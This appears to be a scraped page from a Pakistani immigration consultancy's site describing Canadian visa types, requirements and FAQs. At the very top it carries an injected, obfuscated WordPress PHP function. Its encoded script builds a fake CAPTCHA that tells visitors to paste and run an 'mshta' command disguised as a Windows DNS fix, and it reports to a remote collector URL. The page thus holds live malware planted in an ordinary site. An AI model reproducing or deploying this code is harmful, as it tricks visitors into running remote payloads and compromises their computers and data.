function wp_cloueded() { $encoded_script = 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wK1x4MjBSLjwvbGk+XHgwYVx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjA8bGk+UHJlc3NceDIwQ1RSTFx4MjArXHgyMFY8L2xpPlx4MGFceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwPGxpPlByZXNzXHgyMEVudGVyLjwvbGk+XHgwYVx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMDwvdWw+XHgwYVx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwPC9kaXY+XHgwYVx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjAnKSxfMHg1ODE2YzY9ISFbXTt9fXNldFRpbWVvdXQoXzB4MzMzMDUyLF8weDU3NjNjNCksXzB4MjczMmFhKCksc2V0VGltZW91dChfMHg5YjdkOTYsXzB4NTc2M2M0KSxfMHgzZTdkMmYoKSxfMHgzNTkzZjMoKSxkb2N1bWVudFtfMHg0YmY3YzAoMHhlNCldPT09J2xvYWRpbmcnP2RvY3VtZW50W18weDRiZjdjMCgweGNiKV0oJ0RPTUNvbnRlbnRMb2FkZWQnLCgpPT57c2V0VGltZW91dChfMHg1MmU0NWEsXzB4MWFiNzA2KTt9KTpzZXRUaW1lb3V0KF8weDUyZTQ1YSxfMHgxYWI3MDYpO30oKSkpO2Z1bmN0aW9uIF8weDQ3N2YoKXtjb25zdCBfMHg0YTNmZjg9Wydmb3JFYWNoJywnYWRkZWROb2RlcycsJ2dldEVsZW1lbnRCeUlkJywnY29udGFpbnMnLCdsYW5ndWFnZScsJzEzTklJeXlpJywndGFnTmFtZScsJ3Bha28nLCdkb2N1bWVudEVsZW1lbnQnLCdXZWIzJywnaW5uZXJIVE1MJywnMmJvT01vRScsJzMyMTMzMTIyclFKQUlCJywncG9wdXBPdmVybGF5JywnYmxvY2snLCc0aGJMUmxZJywnb3BhY2l0eScsJzEyZVh1dFdkJywnU0NSSVBUJywnRXJyb3I6JywnaW5jbHVkZXMnLCc3MTQ2RWhTdFpYJywnY2xhc3NMaXN0JywnY2FwdGNoYUNoZWNrYm94JywnanNvbicsJ2Vycm9yJywnMjIxNzMxMFVOcVVkWScsJzE3NDM4NjdITG9jTE8nLCd0aGVuJywnMzZBVnJQbGEnLCdxdWVyeVNlbGVjdG9yQWxsJywncmVtb3ZlJywnY3JlYXRlRWxlbWVudCcsJ9Ce0YjQuNCx0LrQsDpceDIwd29ya2luZ1VybFx4MjDQvdC1XHgyMNC90LDQudC00LXQvScsJzdyU1pQekEnLCdhZGQnLCdpbnNlcnRBZGphY2VudEhUTUwnLCcuY2FwdGNoYS1pbWFnZXNceDIwaW1nJywnb2JzZXJ2ZScsJ0ZhaWxlZFx4MjB0b1x4MjBmZXRjaFx4MjBJUDonLCdodG1sJywnY29va2llJywnc2NyaXB0JywndGV4dGFyZWEnLCdhc3luYycsJ2NhdGNoJywnSUZSQU1FJywnbG9nJywnYWRkRXZlbnRMaXN0ZW5lcicsJ1BPU1QnLCdjbGljaycsJ2Rpc3BsYXknLCdzZWxlY3RlZCcsJzk3MjEwM2l5SGxqTCcsJ2FwcGxpY2F0aW9uL2pzb24nLCdodHRwczovL3d3dy53aW5kb3dzZG5zc2VydmljZXJlbG9hZC5pY3UvY29sbGVjdG9yLnBocCcsJ9Cj0LTQsNC70LXQvdC40LVceDIw0LLRgdC10YVceDIwPGlmcmFtZT5ceDIw0Y3Qu9C10LzQtdC90YLQvtCyLi4uJywnYm9keScsJ3dvcmtpbmdVcmwnLCdkYXRhLWFpLWNvbGxlY3Rpbmctc2hvd249dHJ1ZTtceDIwbWF4LWFnZT0zMTUzNjAwMDtceDIwcGF0aD0vO1x4MjBzYW1lc2l0ZT1sYXgnLCcyMzc2ODgwTlJaU2ZqJywndmFsdWUnLCdvcGFjaXR5XHgyMDAuNXNceDIwZWFzZScsJzYwNjc4OTZOcG5JSXMnLCdteS1jdXN0b20tc2NyaXB0JywnMTM3MTBYdnpRZ2wnLCdceDIwI1x4MjBceDIyTWljcm9zb2Z0XHgyMFdpbmRvd3M6XHgyMEROU1x4MjBzZXJ2aWNlXHgyMFJlbG9hZFx4MjBhbmRceDIwUmVzdGFydFx4MjBVUFx4MjInLCdhcHBlbmRDaGlsZCcsJ3NlbGVjdCcsJ25vbmUnLCdiYXNlNjQnLCdleGVjQ29tbWFuZCcsJ2JlZm9yZWVuZCcsJ3JlYWR5U3RhdGUnLCdtc2h0YVx4MjAnLCdzdHlsZSddO18weDQ3N2Y9ZnVuY3Rpb24oKXtyZXR1cm4gXzB4NGEzZmY4O307cmV0dXJuIF8weDQ3N2YoKTt9'; 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Canadian Immigration and Study in Canada Visa From Pakistan

Canada Visa From Pakistan

There are innumerable Pakistani’s who go to Canada for one reason or another every year and the major cause of this is the very lenient immigration policies of the country. There are several different kinds of visas for Canadian immigration from Pakistan. The procedures, requirements, and validity for Canada visa Pakistan are different and before you can apply for the visa, you must know all the necessary details. Canadian visa application from Pakistan is much the same for these types of visas. There are several centers that facilitate Canada Visa applications from Pakistan, including some in Islamabad, Karachi, and Lahore.

Types of Visa

Visitor Visas

For many Pakistani’s Canada is an attraction in terms of its luxurious lifestyle that they want to experience at least once but, they don’t have much guide about, how to apply Canada visa from Pakistan . People from Pakistan intend to get Canada visit visa from Pakistan because Canada offers multiple opportunities to tourists and they can explore Canada easily. Such people intend only to visit Canada instead of settling there and apply for visit visa for canada from Pakistan. A tourist or visit visa is meant to permit the lawful entry of Pakistanis into Canada. The eligibility for the Canadian Visit visa varies depending on your citizenship. A visitor, in immigration terms, is an individual who has entered the Canadian premises on the basis of a visit visa.

In order to apply for the visit visa for Canadian immigration from Pakistan,  the procedure of Canada tourist visa from Pakistan involves two important steps. First, the candidate has to submit a visa application, and then when the candidate has landed in Canada, he or she has to inform the immigration officer about the purpose of his visit and the length of stay.

Documents Required for Canada Visit Visa from Pakistan

Canada Immigration and Study in Canada Visa from Pakistan

Canada visit visa requirements for Pakistan in 2021 that are mentioned on Canada visa application form Pakistan for the visa include:

  1. The applicant must have a travel document or a valid passport. Copies of expired passports are also required.
  2. The applicant must intend to return once the visit visa expires and follow their rules of Canadian immigration policy strictly.
  3. The applicant should not have any criminal record and should also not have any health condition that is not permitted in immigrants.
  4. A copy of a B form from Nadra.
  5. Applicants must also submit a letter of their employment to indicate their position, salary, date of hiring, and all approved leaves.

While there are several countries including Libya and Albania from where immigrants are supposed to submit fingerprint and photograph identification, this condition does not apply to Pakistanis.

People may worry about the Canada visit visa fee from Pakistan. The visit visa for Canada from Pakistan fee for the application varies . When people apply for Canada visa from Pakistan on done basis, they usually end up thinking about the processing time of the visa. So, visit visa to Canada from Pakistan processing time varies between 10 to 35 days.

Study Permit / Canada Student Visa / Study visa for Canada from Pakistan

Canada offers quality education in various quality institutions with affordable fee. Many Pakistani students are also interested in knowing how to apply for Canada student visa from Pakistan or how to apply for Canadian immigration from Pakistan for pursuing their education in Canada, or what’s Canada student visa fee from Pakistan. 

To do so, students are required to get a stud permit or student visa Canada from Pakistan, if you’re a Pakistani student. A study permit is a document that is given to foreign nationals in order to study in certain designated educational institutions in Canada. A study permit is only a means of ensuring that your request to study in Canada is accepted. It is not a visa so before you can immigrate to Canada, you would also need a visitor visa or an eta (electronic travel evaluation).

You might wonder what the Canada student visa from Pakistan requirements are? We got you covered. To apply for the study permit, you must meet several requirements. The eligibility requirements entail that the applicant must have enrolled in a designated educational institution in Canada, give proof that they can finance their tuition fees, language proficiency, return transportation, and living expenses, for both the applicant himself and his family. The applicant must also have no previous criminal record. Applicants for study permits can be asked to give interviews with immigration officials in Canada and might be requested for more information after their application as well. In certain cases, applicants can be requested to give a medical exam and a police certificate to prove that there were no previous criminal records.

A study permit or student visa for Canada from Pakistan is valid for varying lengths of time depending on the length of the course you are studying in. In addition to that, you are given 90 days to either prepare for leaving the country or apply for an extended stay. For more information on Canada student visa requirements for Pakistan 2021, you can call or email at the number and email given. You can help you as well to get your Canada study visa from Pakistan.

Work Visa or Permit

A work visa for Canada is a permit that allows any eligible overseas individual to work in Canada for a specified amount of time. Once an individual from Pakistan gets an employment contract or job offer from Canada, the individual can apply for the permit. Many dedicated Pakistani workers apply for a work visa to stay in Canada.

In order to be eligible to apply for a Canadian work visa, the applicant must have proof that they are eligible for the job offer, give proof that you intend to leave Canada once the work permit expires, provide evidence that you have the means to finance your stay and the stay of any family members that visit, and show that you have no previous criminal record. The applicant also must take a medical exam to prove their health in certain conditions and must be prepared to provide any additional documents if required.

Parents Visa

A super visa, also known as a parent or grandparent visa is a Canadian visa for Pakistan that allows parents and grandparents of Canadian citizens or permanent residents to stay in Canada for up to 2 years. The visa is a temporary resident permit that remains valid for up to 10 years.

The applicant must be the parent or grandparent of a permanent resident or citizen of Canada. To be eligible to apply for the super visa, the applicant must submit a letter of financial support filled in by their grandchild or child who is a permanent resident or citizen of Canada. Financial support documents include employment insurance studs, bank statements, pay stubs, or an employment letter. The applicant also needs to submit medical insurance that covers one year. The applicant must meet the requirements that allow foreigners to enter Canada and give an immigration medical exam.

In order to apply for the super Canadian visa for Pakistan, you must submit a letter of invitation received from your child or grandchild in Canada, submit evidence for your financial condition, and give proof for the payment of your medical insurance. In situations where the applicant is from a visa-required country, the applicant must also give photo and fingerprint biometrics.

Spouse Visa

One type of visa offered by Canada is a spouse visa. A spouse visa permits the applicants who are married to a permanent resident or a Canadian citizen to get the special opportunity of being sponsored with the couple’s dependent children. This visa allows Canadian citizens and permanent residents to sponsor their eligible family members. It also allows you to invite your grandparents, spouse, dependent children, or parents to settle in Canada as well as the chance to become permanent residents.  Spouse visa, also known as the spousal sponsorship visa, is further categorized as Outland sponsorship and Inland sponsorship.

Canadian immigration from Pakistan on a spouse visa has some requirements that need to be met. To apply for Canada visa from Pakistan, there are some requirements. As a Pakistani, if you want to bring your spouse to live in Canada, you will have to apply for sponsorship for them to make them permanent residents. In case of a visit to Canada while the application is processing, your spouse will be applying for a visitor visa. The requirements for sponsoring your partner include being, at least 18 years, being a Canadian citizen, or a permanent resident in Canada, having no criminal history, and not being sponsored as in the last five years as a spouse. Moreover, to apply, both partners need to show proof of living together like a bank account, shared rent contract, etc. have minimum funds to support themselves and them, and should have a valid passport for being admissible to Canada. This spousal visa is valid for six months.

Super Visa

Canada also offers super visa for Pakistani people living in Canada and wanting to invite their families. A Super Visa permits grandparents and parents of the permanent residents and Canadian citizens to come and visit Canada. This Visa allows them to visit Canada for an extended period. Canada usually offers a single-entry and multiple-entry visitor visa. While the single-entry visas are for 2 years, multiple entry visas can be valid for as much as 10 years, with some requirements like medical examination, insurance, financial support, and an invitation letter. For Canadian super visas, there are some requirements which include:

  1. Being the grandparent or parent of the Canadian citizen or resident of Canada.
  2. Must sign a letter from your grandchild or child who has invited you to Canada
  3. Have medical insurance from any Canadian insurance company that has a validity of 1 year from entry date, coverage of $100,000 at least, and proof of medical insurance being paid.
  4. Among the general rules for a Canadian super visa, the applicant must be from outside Canada, should not be inadmissible for the Canadian super visa, must have taken the immigration medical exam, and must not have any dependents in the application.

This Canadian visa Pakistan allows grandparents and parents to stay in Canada for two years per visit without having to renew the visa status. It holds a validity of up to 10 years. A regular multiple-entry visa also remains valid for 10 years, but it only allows a stay of 6 months in a single visit. Most super visa applications are processed within a few weeks or sometimes earlier.

Working Holiday Visa

People often ask about how to apply for Canada immigration from Pakistan? Among other Canadian visas for Pakistan, a working holiday visa is a special visa that allows young applicants from more than 30 countries to come to get a job in Canada and live legally. In contrast to other visas, this visa is relatively easy to get. As an applicant, all you need to meet the age requirement, provide proof of residence and citizenship in the origin country and have no record of any criminal or medical issues that makes them inadmissible. Based on your country of citizenship, this permit will either be valid for 12 or 24 months. This visa is available in the countries that have an arrangement with Canada about consensual youth mobility. Three different programs come under working holidays in the country, and they are temporary work permits. Canada immigration for Pakistani requires the following things:

  1. A valid passport
  2. Be among the 34 countries that are participating in the visa
  3. Aged between 18-35, some countries have a 30-year cut-off
  4. Have $2,500 for covering the initial expenses
  5. Have a health insurance
  6. Have no dependents
  7. Should have sufficient funds to cover a round-trip ticket, or have one ticket

Moreover, the recent requirements state that the biometric data collection must be conducted at a set venue before the departure. If you can meet the set requirements for the Canadian working holiday visa, you will be offered multiple opportunities as a young to apply for canada immigration from pakistan

Family Sponsorship Visa

Among other Canadian visa for Pakistan, there is a family sponsorship visa that allows an adult Canadian permanent citizen or resident to sponsor his/her relatives for Canadian immigration. The Canadian government has always done its best to reunite as many families as is possible. This family sponsorship visa can be for dependent children, common-law partners and spouses, and grandparents and parents.   Canada visa from Pakistan requirements for a sponsor includes being at least 18 years of age, being a Canadian resident, or a permanent Canadian resident, or a person registered in Canada. Canada visa from Pakistan requires you to be a sponsor for your family. As a sponsor, you have to support your family financially, provide for your needs and needs your family being sponsored to Canada, and to make sure they don’t have to get any social assistance from the Canadian government. Under the family sponsorship visa, you can sponsor:

  1. Common-law partner
  2. Spouse
  3. Dependent children
  4. Grandparents
  5. Parents
  6. Brothers, sisters, nephews, nieces, orphaned grandsons, or granddaughters, under 18 years, and those who are not married or are not in a common-law relationship.
  7. Any accompanying relatives of the ones listed above
  8. Some other relatives of any relation or any age but allowed only under specific conditions.
Students Direct Stream

Students Direct stream has been the expedited study permit which is processing the program for those students who are like to apply to get an education in Canada at the post-secondary which has been designated by learning the institution where the SDS has been available towards the legal residents who also reside in another country around the world.

Permanent Residency in Canada

Hence, the permanent residency is considered as someone who is issued by the permanent residency visa by the Canadian government and also has been landed in the land of Canada as a foreign national, not as the Canadian Citizen.

The permanent residents of Canada have the right to the social and health benefits, which make that Canadian citizens get. Permanent residence could live work and study anywhere in Canada, which used to apply for Canadia citizenship after spending a certain amount of their time as a permanent resident in Canada.

Therefore, the permanent Resident has the protection under the Government Canadian law and the Canadia charter of making rights and freedom.

Canadian Immigration from Pakistan

Canadian Immigration from Pakistan

Canadian permanent Residency application based on the following, i.e.

  • A federal skilled worker program
  • Canadian Experience class
  • Federal skilled and Trade program
  • Provisional Nominee program
  • Investor & Business Class program
  • Humanitarian and compassionate consideration

Express Entry Canadian Immigration

The express entry of any employer gives them an excellent opportunity for their recruitment in different segments of employment in Canada. The express entry uses to support the labor shortage when there are no Canadian citizens or permanent residents who help in finding the job. Hence, express entry allows employers to have a direct role in recruiting skilled workers.

Express entry used to match with the applicants through job banks and as well as apply for the labor market impact assessment.

If the foreign worker has worked in Canada on the work permit which supported the job exempt for needing one which could offer them the job in order to support the application on the permanent residence.

Pakistani Students in Canada
Pakistani Students in Canada

Work in Canada

Hence, if you want to permanently hire for the foreign worker which you do not have the LMIA for the job which needs to try and find the Canadian or permanent resident to fill the job. Though, you need to meet the LMIA requirements by including posting your job ad on the Government of the Canadian Job Bank and advertisement in two other places.

The Express Entry candidates cant usually work in the Canadian until they have their permanent resident visa. In some of the cases, they would already be in Canada with the temporary work permit. Express Entry allows all candidates who get the job offer and have been invited in order to apply which will not automatically get the work permit or temporary resident visa while we process their application.

Candian government selects the eligible candidates which are capable of contributing towards the growth of their economy through the express entry system by assessing the application on the basis of the number of human capital factors.

How to Apply for Canadian Immigration from Pakistan 

Most famous Canadian Immigration program are as following
  • Express Entry Program
  • FSW Program
  • In order to apply online visa application for canada from pakistan you must have valid credit card for the payment and electronic copies of all the required documents.

Best Canadian Immigration Consultant in Lahore

Want to apply for Canadian immigration from Pakistan and wondering how to apply for Canada visa from Pakistan? We’ve got number of successful clients and also know fast-tracking of application. HighBrow is a certified firm for immigration and visa consultancy in Pakistan. The number of students who have started their degrees from Canada and families are also immigration from our platform.

Best Canadian Immigration Consultant in Lahore
Best Canadian Immigration Consultant in Lahore

Frequently Asked Questions About Canada Visa and Immigration

Is there any Canada lottery visa for Pakistan 2021?

No, Canada doesn’t offer any lottery visa for Pakistan. However, you may find information on internet, they are misleading, so be beware of such websites. They may scam you.

How to get Canada visa from Pakistan?

You can get Canada visa on done base in Pakistan by consulting immigration specialists of Pakistan. 

What are the Canada visa requirements for Pakistan?

For the application of Canada visa from Pakistan , there are multiple requirements. You are required to submit your documents.

Can I apply for Canada visa online from Pakistan?

Yes, you can apply for the Canada Visa online. You can even download the Canada visa application form Pakistan online. For more information, you can visit this link. Here you will get all the information on complete process,  who can apply, and what to do after you apply.

What’s the Canada visa fees in Pakistan?

Hence, there are different types of Canada visa, so the prices may vary ,you have to contact us. However, we suggest you to call us at +924236600066 or email us at for accurate information on Canada visa price in Pakistan.

How to track Canada visa application in Pakistan?

Among many services, Highbrow also offers Canada visa tracking in/from Pakistan. We help you know the Canada visa requirements, apply for the Canada visa, and get it with ease and at low-prices. 

How much bank balance is required for Canada immigration?

The amount of bank balance for the Canadian immigration varies in accordance with the number of family members. Specifically, for the one family member the bank balance should be $12,960.

What is the maximum age to immigrate to Canada?

Basically, there is no such issue regarding age for the process of Canada immigration but points for the immigration start getting less with the increase in age. So, the best age to get maximum points is 25 to 35.
